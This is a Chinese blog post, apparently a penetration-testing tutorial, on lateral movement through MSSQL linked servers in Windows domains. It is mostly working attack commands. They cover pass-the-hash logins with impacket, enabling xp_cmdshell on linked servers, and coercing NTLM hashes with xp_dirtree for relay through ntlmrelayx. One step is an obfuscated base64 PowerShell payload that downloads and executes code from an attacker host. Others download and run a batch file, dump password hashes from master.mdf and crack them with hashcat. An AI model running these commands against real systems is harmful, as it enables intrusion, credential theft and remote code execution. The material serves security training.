域环境下利用MSSQL横向渗透技巧

已于 2024-07-05 11:11:44 修改
阅读量512 收藏 19
点赞数 7
分类专栏: 思路 文章标签: 网络安全 安全威胁分析 mssql
于 2024-06-07 16:26:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuwenshequ/article/details/139530139
版权
前言

在我们做渗透测试的过程中有时候会遇到mssql  server数据库,当我们通过rce、sql注⼊弱⼝令 空密码 凭据泄漏等⽅式最终可以登录mssql server所在服务器/数据库时。今天将以不同的攻击⻆度来看下如何完成后续的横向渗透及拓展。

信息查询语句
SELECT IS_SRVROLEMEMBER('sysadmin','[domain]\username') //
查询当前⽤户是否是系统管理员组,为1则为系统管理员
 
SELECT IS_SRVROLEMEMBER('public','[domain]\username'); //查询当前⽤户是否是公共⻆⾊,为1则为公共⻆⾊
 
SELECT SYSTEM_USER; //查看系统组⽤户身份
 
SELECT USER_NAME();  //查看当前登录⽤户名
MSSQL IMPERSONATE权限
//查看可模仿的⽤户名,若有则可以AS LOGIN 从⽽命令执⾏
 
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN 
sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE 
a.permission_name = 'IMPERSONATE';
MSSQL 执⾏CMD

A.xp_cmdshell ⽅式

//查看sp_configure选项是否开启
EXEC ('sp_configure ''show advanced options'', 1; reconfigure;') AT linked hostname;

图片

B.sp_OACreate ⽅式

图片

C.其他⽅式

利⽤MSSQL进⾏横向移动

什么时候考虑从mssql来进⾏横向移动?

⽐如域内SPN 通过Kerberoast 获取了SPN server的HASH,但⽆法如下图⼀样破解出密码并登录

图片

图片

或者必须要通过⼀些数据联合调⽤的情况时,可尝试寻找利于MSSQL来横向移动,当然通过mssql横向除了link-server以外还有其他的⽅式可以完成,这点留在最后。

简单来讲MSSQL达到横向移动通常只在配置了sql-link条件下才能做横向移动,并且若启动 mssql服务的⽤户是管理组成员,则可通过多种⽅式完成横向移动

图片

配置了mssql-link-server

图片

使⽤当前⽤户凭据 成功连接mssql-link-server

这种场景下的横向移动攻击⽅式可应⽤于局域网、AD Domain 和 Forest Domain,三种的区别仅

仅是是否有域信任、林内域或林外域信任关系

实例演示

注:本次演示只演示MSSQL横向移动的⽅法,不涉及提权的部分。

1-基于局域⽹的MSSQL-link横向移动

假设局域⽹内⼀台部署了mssql server的机器存在安全隐患导致MSSQL⽤户/管理员的凭据泄漏

那么我们可以使⽤两种⽅式先连接mssql

//mssql user way
impacket-mssqlclient -p 1433 -db music webapp11:******@192.168.57.140

//windows-auth way
impacket-mssqlclient -p 1433 -db master administrator:******@192.168.84.140
-hashes ***:*** -windows-auth

也可以直接使⽤kali  ⾥⾯的mssql,内置了2种命令执⾏的⽅法

mssqlclient.py -p 1433 -db master administrator@172.16.110.107 -hashes
 ******:****** -windows-auth

如果以windows-auth登录的话,若是管理员组成员,那么是ado权限,可直接执⾏系统命令

如果以windows-auth登录的话,若不是管理员组成员,那么是guest权限,需要进⼀步进⾏提权(提权mssql权限或提权windows user权限)然后利⽤ IMPERSONATE 进⾏权限伪造 登录后均可查询link-server,当我们发现⼀台设备的mssql具备sqlserver-link的情况,并且当前⽤户凭据可以登录link server的数据库时,可以进⼀步攻击link的服务器

EXEC sp_linkedservers;

可以看到本机(SQL11)链接了SQL27 跟 SQL53

图片

可以看到本机对link的机器进⾏连接测试成功,那么便可以通过openquery ... AT的⽅式尝试调⽤xp_cmdshell等⽅式执⾏命令

图片

EXECUTE AS LOGIN = 'webapp11';
EXEC ('sp_configure ''show advanced options'', 1; reconfigure;') AT SQL27; EXEC ('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT SQL27;
EXEC ('xp_cmdshell ''whoami'';') AT SQL27;

图片

图片

2.基于MSSQL的域环境下横向渗透

背景:两台配置了域内机器/域信任机器,其中⼀台配置了另⼀台的link-server。下⾯⽤两个实例来做下简单演示,两者还是有细微的区别。

命令执⾏实例

//使⽤AT在link-server命令执⾏
EXEC ('sp_configure ''show advanced options'', 1; reconfigure;') AT linked- hostname;
EXEC ('xp_cmdshell ''whoami'';') AT linked-hostname;

使⽤openquery

图片

ntlm-relayx实例

使⽤ntlmrelayx 监听来⾃⽬标机器的哈希凭据(⽬的是通过sql-link⽅式通过smb协议窃取凭据,并执⾏系统命令)

在已拿下的机器通过如xp_dirtree的⽅式远程访问共享⽬录

//in kali
proxychains impacket-ntlmrelayx --no-http-server -smb2support -c "cmd" -t target_ip
//in pwned-mssql
EXEC master..xp_dirtree //kali_ip/share

当我们当前使⽤的mssql凭据可以直接连接link机器时,可以直接通过下列命令在link机器上完成命令执⾏

图片

若放到link-server场景下,使⽤openquery来窃取凭据就是如下命令,这样则可以窃取到link⽬标的哈希

select 1 from openquery("sqllinked-hostname", 'select 1; EXEC master..xp_dirtree ''\\192.168.49.57\share''')
proxychains impacket-ntlmrelayx --no-http-server -smb2support -c 'powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBl AGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkA UAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJAB1AFMARQB2AD0AbgBl AHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwBpAGYAKABbAFMA eQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBQAHIAbwB4AHkAXQA6ADoARwBlAHQARABlAGYAYQB1AGwAdABQAHIAbwB4AHkAKAApAC4AYQBkAGQAcgBlAHMAcwAgAC0AbgBlACAAJABuAHUAbABsACkA ewAkAHUAUwBFAHYALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABd ADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJAB1AFMARQB2AC4A UAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBu AHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEA bABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBi AEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAA OgAvAC8AMQA5ADIALgAxADYAOAAuADQAOQAuADgANAA6ADgAMAA4ADAALwBDAHoAcQBUAFMAYgAx AG0AQgAvAGMAWQB4AHEAVgA2ADYAOQBUACcAKQApADsASQBFAFgAIAAoACgAbgBlAHcALQBvAGIA agBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABT AHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4ANAA5AC4AOAA0ADoA OAAwADgAMAAvAEMAegBxAFQAUwBiADEAbQBCACcAKQApADsA' -t 172.16.84.151

图片

3-MSSQL横向tips拓展

A.MSSQL-Account Hash Crack

https://github.com/xpn/Powershell-PostExploitation

Add-Type -Path 'OrcaMDF.RawCore.dll' 
Add-Type -Path 'OrcaMDF.Framework.dll' 
import-module .\Get-MDFHashes.ps1
Get-MDFHashes -mdf "C:\Users\administrator\Desktop\master.mdf"

图片

Get-MDFHashes -mdf "C:\Users\administrator\Desktop\master.mdf" | format-list

图片

然后可以⽤hahscat 开始爆破

hashcat -m 132 -O -a 0 -w 4 --session=mssql -o mssql.out mssql_hash seclists/Passwords/darkc0de.txt -r rules/d3ad0ne.rule

B-RPC OUT settings

RPC Out不是默认开启的设置,但通常由系统管理员设置。如果不允许RPC Out,如果我们当前的⽤户具有 sysadmin⻆⾊成员身份,则可以使⽤sp_serveroption存储过程,Microsoft⽂档明确指出在链接的SQL 服务器上不⽀持执⾏存储过程。相反,我们将使⽤AT关键字来指定应该在哪个链接的SQL服务器上执⾏查询。

图片

默认是不开启的,所以需要开启它 有两种⽅式

第⼀种:在获取的配置了SQL-link的机器上通过属性开启

第⼆种:通过mssql-client命令⾏开启

EXECUTE AS LOGIN = 'sa';
SELECT
 is_rpc_out_enabled FROM sys.servers
 WHERE name = 'sqllinked-hostname';
EXEC sp_serveroption 'sqllinked-hostname', 'rpc out', 'true';

图片

图片

C-PowerUpSQL

https://github.com/NetSPI/PowerUpSQL

https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheet

//在拿下的配置了sql-link-server的机器中使⽤当前凭据查询link machine并执⾏命令
Get-SQLServerLinkCrawl -Instance instance1 -Query "exec master..xp_cmdshell 'cmd /c calc.exe'" -Verbose

else

//在target machine上执⾏printnight
EXEC ('xp_cmdshell ''curl 192.168.49.57:82/a.bat -o
 c:\users\public\b.bat'';') AT sqllinked-hostname

EXEC ('xp_cmdshell ''c:\users\public\pf.exe -i -c "cmd.exe /c
 c:\users\public\b.bat"'';') AT sqllinked-hostname

//命令执⾏失败时 查看是不是openquery失败了。
select version from openquery("sqllinked-hostname", 'select USER_NAME() as
version')
参考⽂档

https://notes.vulndev.io/notes/redteam/payloads/windows/mssql

https://blog.xpnsec.com/extracting-master-mdf-hashes/

https://www.graa.nl/articles/1930.html

https://h4ms1k.github.io/Red_Team_MSSQL_Server/#

https://wiki.apbcybersec.co.za/windows/active-directory/red-teaming/domain-privilege- escalation/trust-abuse-mssql

https://www.modb.pro/db/66194

无问社区
关注
  • 7
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网渗透系列:横向渗透方法小结
闵行小鱼塘
08-04 4214
本文学习并小结下横向渗透的方法
红队技巧-渗透的协议利用
Gamma_lab的博客
06-29 2361
1.pth(hash传递) 1.1 PTH简介 哈希传递(pth)攻击是指攻击者可以通过捕获密码的hash值(对应着密码的值),然后简单地将其传递来进行身份验证,以此来横向访问其他网络系统,攻击者无须通过解密hash值来获取明文密码,因为对于每个Session hash值都是固定的,除非密码被修改了(需要刷新缓存才能生效),所以pth可以利用身份验证协议来进行攻击,攻击者通常通过抓取系统的活动内存和其他技术来获取哈希。 1.2 PTH限制 在03之后有了uac,所以本地只有sid 为500和admi
内网渗透技巧大全
黑战士的博客
04-28 1369
对于内部帐户,SPN将自动进行注册。SPN扫描的主要好处是,SPN扫描不需要连接到网络上的每个IP来检查服务端口,SPN通过LDAP查询向控执行服务发现,SPN查询是Kerberos的票据行为一部分,因此比较难检测SPN扫描。参考2 :https://3gstudent.github.io/Office-Persistence-on-x64-operating-system。安装键盘记录的目地不光是记录本机密码,是记录管理员一切的密码,比如说信箱,WEB 网页密码等等,这样也可以得到管理员的很多信息。
【基础篇】————28、横向渗透
Fly_鹏程万里
05-27 2764
0x00 端口渗透 端口扫描 端口的指纹信息(版本信息) 端口所对应运行的服务 常见的默认端口号 .尝试弱口令 端口爆破 hydra 端口弱口令 NTScan Hscan 自写脚本 端口溢出 smb ms08067 ms17010 ms11058 ... apacheftp... 常见的默认端口 1、web类(web漏洞/敏感目录) 第三方通用组...
渗透入侵\mssql注射.zip
07-15
渗透入侵和MSSQL注入是网络安全领中的两个关键概念,主要关注的是如何通过不安全的数据库交互来攻击或防御系统。MSSQL(Microsoft SQL Server)是微软公司提供的一款关系型数据库管理系统,广泛应用于企业级数据...
记一次利用mssql上线1
08-03
在这种情况下,可以尝试使用forfiles命令来规避限制,如`forfiles /c "test.exe"`,但具体的实现细节在文中未给出,这通常需要与系统的特定环境和配置相结合。 整个过程展示了MSSQL注入漏洞的危害以及安全防御的...
God.org单环境攻略(三)1
08-08
在这篇文章中,我们将讨论 God.org 单环境攻略的第三部分,主要集中在目标机器 192.168.3.30 的攻击上。首先,我们探测了局网内存活的主机,发现了 5 台存活主机。然后,我们对目标机器 192.168.3.30 进行了...
E116-经典赛题-mssql数据库渗透测试.pdf
12-02
E116-经典赛题-mssql数据库渗透测试
Linux下安装PHP MSSQL扩展教程
10-25
主要介绍了Linux下安装PHP MSSQL扩展教程,本文环境是SUSE Linux Enterprise Server 10 SP3,其它系统也类似,需要的朋友可以参考下
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8332
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
强敌环伺:金融业信息安全威胁分析——整体态势
AKAMAI_CHINA的博客
01-29 1076
在Web应用程序和API攻击、零日漏洞以及DDoS攻击等方面,金融服务业一直是最主要的三大被攻击目标垂直行业之一。金融服务业的Web应用程序和API攻击数量同比激增3.5倍,在所有主要行业中增速最快。如何阻止Web应用程序和API攻击利用新发现的零日漏洞针对金融服务业发起的攻击,在24小时内就可以轻松达到每小时数千次的规模,并且会快速达到峰值,这使得防御者几乎没时间打补丁或做出反应。
一口气说出4种主流数据库ID自增长,面试官懵了
m0_54866636的博客
06-21 430
数据库自增长ID,不需要设置和绑定 ID 数据列。在往数据库中插入数据的时候,数据库会自动为每条数据生成一个递增的ID,本文做了详细的说明。如下图: 实例??? 第一步:登陆PG ??? 第二步:创建表 ??? 第三步:现在往表中插入几条记录??? 查看 COMPANY 表的记录如下 大家点赞、收藏、关注、评论啦 ???微信公众号???...
SQL教程之 5 个必须知道的用于操作日期的 SQL 函数
iCloudEnd的博客
06-23 522
如果你在我得到第一份工作之前问到数据科学家最重要的技能,我的答案肯定是 Python。毫无疑问!我现在是一名数据科学家,如果你问我同样的问题,我的答案仍然是 Python。不过,我有第二个想法。让我三思而后行的是 SQL。SQL 是数据科学家必备的技能。它主要用于查询关系数据库,但它能够执行更多。SQL 配备了如此多的功能,使其成为高效的数据分析和操作工具。在本文中,我们将介绍 5 个用于操作日期的 SQL 函数。在处理涉及基于日期或时间的信息的数据时,它们会派上用场。注意: SQL 被许多关系数据库管理系
工作述职报告PPT模板 (25)
07-12
【作品名称】:工作述职报告PPT模板 (25) 【适用人群】:适用于希望学习不同技术领的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
H公司项目管理基础培训两份材料.pptx
07-12
H公司项目管理基础培训两份材料.pptx
OGSM一页纸,让战略极简落地.pptx
最新发布
07-12
OGSM一页纸,让战略极简落地.pptx
第三季度部门工作报告PPT模板
07-12
【作品名称】:第三季度部门工作报告PPT模板 【适用人群】:适用于希望学习不同技术领的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
第一百一十一课:内网mssql完整利用流程 [ 基础篇 ]1
08-03
前言:关于 mssql 在实战渗透中的价值,想必就不用再多说了吧,包含大批的敏感数据,方便快速 getshell,可被利用的众多权限维持技巧...此处,我们仍以

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值